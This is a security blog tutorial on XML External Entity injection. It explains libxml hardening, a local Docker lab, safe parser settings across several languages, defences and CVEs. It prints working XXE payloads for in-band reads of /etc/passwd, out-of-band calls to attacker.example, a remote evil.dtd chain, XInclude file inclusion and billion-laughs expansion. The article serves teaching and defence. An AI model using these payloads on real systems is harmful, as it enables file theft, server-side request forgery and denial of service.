TechEarl

XML External Entity (XXE): The Complete 2026 Practitioner Guide

XXE deep dive: in-band file reads, out-of-band exfiltration via external entities, XInclude, billion-laughs DoS, and what libxml 2.9.x's hardening actually changed in 2026.

Ishan Karunaratne⏱️ 8 min readUpdated
Share thisCopied
XML external entity attack diagram showing file disclosure

XML External Entity injection is the vulnerability that defined an OWASP Top 10 slot in 2017, then quietly vanished from the next edition because the parsers got fixed. That second half is half true. libxml flipped external-entity loading off by default back in 2012, the rest of the major parsers followed across the next few years, and the textbook out-of-band exfil chain that every penetration-test report used to feature does not fire end-to-end on a modern PHP 8.2 install. The out-of-band primitive itself still works. XInclude is still a separate bypass that audits routinely miss. Legacy applications still ship with the unsafe flags re-enabled because someone copied a Stack Overflow snippet in 2014. This article is the field-tested, parser-version-honest version of the XXE story.

This is the spoke companion to the web application security vulnerabilities taxonomy. I cover what XXE is, the four attack flavours, what libxml 2.9.x actually changed (with the dates), a working walk-through against a Dockerised lab that proves which patterns still fire and which do not, the equivalents in Java, .NET, Python, and Go, the modern defences, and a handful of verified CVEs.

What is XXE?

XML External Entity injection is what happens when an XML parser is asked to parse attacker-controlled XML with external-entity resolution turned on. The attacker declares a custom entity inside the document's DOCTYPE whose value is a SYSTEM URI, the parser dereferences that URI as part of building the parse tree, and the result of the dereference (file contents, the body of an HTTP response, the output of a network probe) gets substituted into the document wherever the entity is referenced.

It is catalogued as CWE-611, Improper Restriction of XML External Entity Reference. It used to sit at A04 in the OWASP Top 10 2017. In the 2021 edition it was folded into A05 Security Misconfiguration, on the reasoning that the parsers ship safe and the remaining incidents are almost always a deliberate config flag set wrong rather than a fresh bug.

The mechanism rides on three XML features that are easy to forget exist:

  1. DTDs (Document Type Definitions). A <!DOCTYPE> block inside an XML document can declare entities, including external ones, that are then expanded as the document is parsed.
  2. General entities. <!ENTITY foo SYSTEM "file:///etc/passwd"> declares an entity named foo whose expansion is the contents of /etc/passwd. Referencing it as &foo; in the document body substitutes the file content at that point.
  3. Parameter entities. <!ENTITY % foo SYSTEM "..."> is the variant used inside the DTD itself, expanded with %foo;. They are the building block for the classic blind exfil chain.

XML, in other words, is a small programming language. If you forget that and you hand attacker input to a parser configured to evaluate it, you get the predictable result.

The four attack flavours

Classic in-band XXE: file read reflected in the response

The simplest case. The application accepts XML, parses it with external entities enabled, and then reflects some parsed value back in its HTTP response. The attacker declares an entity that reads a local file and references it in a field that gets reflected.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>

The parser substitutes &xxe; with the bytes of /etc/passwd while building the tree. The application, none the wiser, walks the tree and echoes <name> into HTML. The full file lands in the response.

This pattern requires the application to actually surface parsed content back to the user, which is more common than you would think: any importer that says "imported these 12 records, here they are" is a candidate.

Out-of-band HTTP exfil: direct external entity

Same shape, but the attacker does not need reflection. The SYSTEM URI is an HTTP URL pointing at an attacker-controlled server. When the parser resolves the entity, libxml issues an outbound HTTP request to that URL. The attacker reads the request out of their access log.

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://attacker.example/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

This is the version of OOB that still works on current libxml. The application response can be a flat OK, the parser still reaches out. The trade-off is that the attacker only proves the primitive fires, they do not directly exfiltrate file contents this way: a SYSTEM URI of file:///etc/passwd cannot have the file content baked into a follow-up HTTP request inside a general-entity declaration, because XML does not allow entity references inside entity values that resolve to URIs at that layer.

Direct OOB is enough to turn a server into an SSRF gadget against internal-only HTTP services and, in some libxml builds, a wide range of other URI schemes.

XInclude: an entirely separate path

XInclude is a W3C specification (XML Inclusions) that lets one XML document include the parsed content of another through a dedicated element rather than through entity resolution. It uses a separate libxml entry point (xmlXIncludeProcess in C, $dom->xinclude() in PHP) and a separate set of flags. Code that has carefully disabled DTD loading and external entities can still be vulnerable if it also calls the XInclude processor on attacker-controlled XML.

xml
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>

No DOCTYPE, no <!ENTITY>. An audit that grepped for <!ENTITY would miss this. The fix is "do not call the XInclude processor on untrusted input", which sounds obvious until you find it in a legacy XSLT pipeline.

Billion laughs: entity-expansion DoS

The original "XML bomb". A nested chain of general entities that, when fully expanded, balloons a few hundred bytes of input into gigabytes of output, exhausting memory before the parse completes.

xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol6 "...">
]>
<root>&lol6;</root>

libxml has mitigated this by default for years through a hard entity-expansion ceiling: the parser refuses to expand a document past a fixed substitution limit and aborts with a diagnostic instead. The mitigation can be turned off (passing LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C). If you cannot find a reason your code needs LIBXML_PARSEHUGE, you do not need it.

What libxml 2.9.x actually changed

This is the part most XXE write-ups handwave, and it matters, because the version of the parser is the difference between "textbook OOB file exfil works in five minutes" and "the only thing that fires is the direct entity probe".

libxml2 2.9.0 shipped on 2012-09-11. The headline change for this article is that external-entity loading is off by default: a fresh xmlReadFile call will not dereference a SYSTEM URI unless the caller explicitly opts in with XML_PARSE_NOENT (or, in PHP, passes LIBXML_NOENT to loadXML). Every textbook XXE payload from before 2013 assumed external entities loaded by default. After 2.9.0 they did not.

libxml2 2.9.4 (2016) and the subsequent 2.9.10 / 2.9.11 / 2.9.12 / 2.9.13 / 2.9.14 line tightened parameter-entity processing further: the parser refuses to expand a parameter-entity declaration loaded from an external DTD if that declaration in turn introduces a new entity whose body needs to resolve another parameter-entity reference. Concretely, the classic "load evil.dtd containing recursive %file + %eval + %exfil definitions, force %exfil; to fire so the file contents land in a second outbound HTTP request" chain no longer fires end to end.

I confirmed this against PHP 8.2 linked to libxml2 2.9.14 (Debian bookworm package) in the companion lab below. The DTD itself loads (the collaborator container logs GET /evil.dtd). The second-stage %exfil; GET that was supposed to carry the file contents in its query string never lands. The OOB primitive is intact; the OOB-file-content-exfil chain is mostly historical.

The take-away is not "XXE is fixed". It is:

  • On a modern libxml, you need either an application that explicitly re-enables external entities (legacy code, "we need DTDs for our SOAP client", LIBXML_NOENT | LIBXML_DTDLOAD) or a different code path entirely (XInclude).
  • When you do find such an application, classic in-band reflection still works for file reads, direct OOB still proves egress and gives you SSRF, XInclude still pulls files.
  • The PortSwigger / OWASP write-ups that show file-content exfil through a recursive parameter-entity chain are correct against older parsers and against parsers built with different flags. They are not correct against PHP 8.2 with stock libxml. Test against the actual parser the target runs.

Walk a working chain: the xxe-basic lab

The techearl-labs repo ships an xxe-basic lab that mirrors the four flavours above. The parser is configured with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, which is the unsafe combination: external entities are substituted, the inline DOCTYPE is allowed to dereference SYSTEM URIs, XInclude is opted into on a separate endpoint. The entity-expansion limit is left on, deliberately, so the lab can demonstrate the default mitigation working.

Bring it up:

bash
docker compose up xxe-basic

Two endpoints:

  • POST /import.php reflects every <name> element back in the HTML response. In-band XXE and XInclude land here.
  • POST /upload-blind.php returns a flat OK / Error. Blind / OOB scenarios land here.

Every scenario uses the same curl shape:

bash
curl -s -X POST --data-binary @payload.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php

Scenario 1: in-band file read

Save the classic in-band payload from earlier in this article to payload.xml and POST it to /import.php. The response includes a bookmark whose <strong> is the full /etc/passwd text from the container.

Scenario 2: direct OOB via external entity (this fires on libxml 2.9.14)

This is the variant that proves the OOB primitive still works. Send the payload to /upload-blind.php:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

Tail the collaborator in a second terminal:

bash
docker compose logs -f xxe-basic-collab

You will see a line of the shape [collab] GET from <ip> path=/?leak=fired. The application response is just OK. The parser issued the outbound HTTP request anyway. This is the real, fires-today primitive.

Scenario 3: the textbook recursive parameter-entity chain (does not fire end to end on this libxml)

The lab also ships an evil.dtd and the payload that points at it:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

POST to /upload-blind.php. The collaborator logs GET /evil.dtd, proving the parser fetched the external DTD. The second-stage exfil GET that the DTD tries to trigger never lands. This is the libxml 2.9.x hardening at work. I am including this scenario in the article because it is what every other XXE tutorial demonstrates and it is the single most important version-sensitive footgun: the pattern works against older parsers (and against parsers explicitly built with the hardening disabled) and produces a clean negative against modern ones, which makes "we tested XXE and nothing happened" hard to interpret without knowing the parser version.

Scenario 4: billion laughs (default-mitigated)

POST the nested-entity payload to /import.php. libxml's entity-expansion ceiling refuses to expand the document and the endpoint returns an XML parse error. Container CPU and memory stay flat. This is the right answer: the attack is documented, the mitigation that already blocks it is also documented.

Scenario 5: XInclude file read

POST the XInclude payload to /import.php. The application explicitly calls $dom->xinclude() on the parsed document, the include is expanded in place, and the container's /etc/hostname lands in the response. No DOCTYPE, no entity declaration. An audit looking only for <!ENTITY in source code or in incoming XML would miss this entirely.

XXE in other parsers

The libxml story is the most-documented because PHP, Perl, Ruby's Nokogiri, and most of the Python C-extension XML parsers wrap it. The other major XML stacks have their own histories and their own safe-default flags.

Java

Historically the worst offender. DocumentBuilderFactory, SAXParserFactory, XMLInputFactory, and TransformerFactory all default to "evaluate everything", and the safe configuration has to be applied per factory:

java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

The OWASP XXE Prevention Cheat Sheet has the full list per factory. Newer Java releases have raised the default secure-processing baseline, but the long tail of Java XML code in production was written when the defaults were unsafe.

.NET

XmlDocument.XmlResolver has been null by default since .NET Framework 4.5.2 (released 2014), which kills entity resolution. XmlReaderSettings controls the modern path:

csharp
var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};
using var reader = XmlReader.Create(input, settings);

DtdProcessing.Prohibit is the right default for parsing arbitrary input. DtdProcessing.Parse plus a null resolver is the right setting if you genuinely need DTD-defined entities but no external dereferencing. DtdProcessing.Parse plus a non-null resolver is the unsafe combination.

Python

The standard library xml.etree.ElementTree has been safe by default for years: it does not resolve external entities and it raises an error on entity definitions in the DOCTYPE. The riskier modules are xml.dom.minidom, xml.sax, and the third-party lxml (which wraps libxml). The Python security docs recommend defusedxml for any code that has to parse untrusted XML, which wraps every standard-library parser and explicitly raises on DTD declarations, external entities, and entity expansion bombs:

python
from defusedxml.ElementTree import fromstring
tree = fromstring(untrusted_xml)

For lxml specifically:

python
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(untrusted_xml, parser)

Go

encoding/xml does not support DTDs or external entities at all. It is the safest XML parser of the major languages, by design. The only XXE-shaped risks in a Go codebase come from binding a third-party C XML library, or from running an XSLT pipeline that does support external resolution.

Modern defences

The defensive story for XXE is genuinely simple, in a way most vulnerability classes are not:

  1. Disable external entity resolution entirely. Almost no production application needs to dereference SYSTEM URIs while parsing user input. Set the right flags per parser and walk away. In PHP, the safe flags are "none of the unsafe ones": do not pass LIBXML_NOENT, do not pass LIBXML_DTDLOAD. The defaults are correct.
  2. Do not call XInclude on untrusted input. XInclude is opt-in; treat opt-in as a deliberate architectural decision and make sure the input has been schema-validated first.
  3. Prefer JSON for new APIs. JSON parsers do not have an entity-resolution layer at all. The class is closed off by construction. This is the realistic long-term answer for greenfield work, but it does not retire legacy XML endpoints in your existing codebase.
  4. Schema-validate XML inputs strictly. A strict XSD that rejects unexpected elements raises the cost of an XXE probe even if the parser is misconfigured. It is a defence-in-depth layer, not the fix.
  5. Network-egress restrictions on application hosts. The OOB primitive needs an outbound HTTP request from the application to the internet. A default-deny egress policy denies the primitive even when the parser config is wrong. This is the same advice that closes off the out-of-band tier in SQL injection (see the SQL injection deep dive) and SSRF.
  6. Keep libxml current. The hardening between 2.9.0 and 2.9.14 was incremental and significant. Old PHP and old Python installs that statically link an old libxml are the realistic targets, not fully-patched 2026 stacks.

Real-world incidents

XXE has a credible CVE history across vendors and product categories. Three illustrative examples, with the caveat that you should always pull the exact affected versions from the vendor advisory or NVD entry before quoting them in production:

  • CVE-2019-3960 in Citrix ShareFile (StorageZones Controller). XXE in a file-handling endpoint, the kind of legacy SOAP-adjacent integration where unsafe parser defaults survive into 2019.
  • CVE-2022-23307 in Apache Log4j 1.x's Chainsaw XML config loader, part of the long tail of CVEs filed against Log4j 1.x after the Log4Shell disclosure pulled the world's attention back to the abandoned 1.x branch.
  • The 2014 Facebook XXE reported by Reginaldo Silva (writeup). The interesting twist is that Silva escalated a plain XXE into remote code execution via PHP's expect:// stream wrapper, paid out at the top tier of the bug-bounty programme, and remains the canonical example of why an XXE finding should not be classified as "information disclosure" and closed at low severity. The escalation path is the lesson, the specific PHP wrapper less so.

The pattern across the CVE history: XXE rarely appears in newly-written code, frequently appears in legacy XML configuration parsers and SOAP / SAML endpoints, and is usually chained into SSRF or occasionally into RCE rather than ending at file disclosure. Modern Java middleware (Cisco, IBM, Oracle product lines) has had a steady drip of similar findings through 2018 to 2024 wherever a SOAP service was wired up before its XMLInputFactory had FEATURE_SECURE_PROCESSING enabled by default; rather than name specific CVE IDs from memory, the safer recommendation is to search the vendor's advisory database for "XXE" or "CWE-611" before assuming any product is safe.

Where to go next

The companion piece on the tooling that automates XXE discovery and exploitation is best XXE tools for 2026: the Burp Suite XML scanner, the XXEinjector toolkit, custom Python scripts using lxml or defusedxml to fuzz parser configurations. The hub page is the web application security vulnerabilities taxonomy. Sister spokes worth following from here: SQL injection for the other "untrusted input parsed as code" class, and the SSRF spoke (when published) for what an OOB primitive actually buys an attacker after the entity has resolved.

Sources

Authoritative references this article was fact-checked against.

Tagsxxexml-external-entityowasp-top-10libxmlparser-security

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts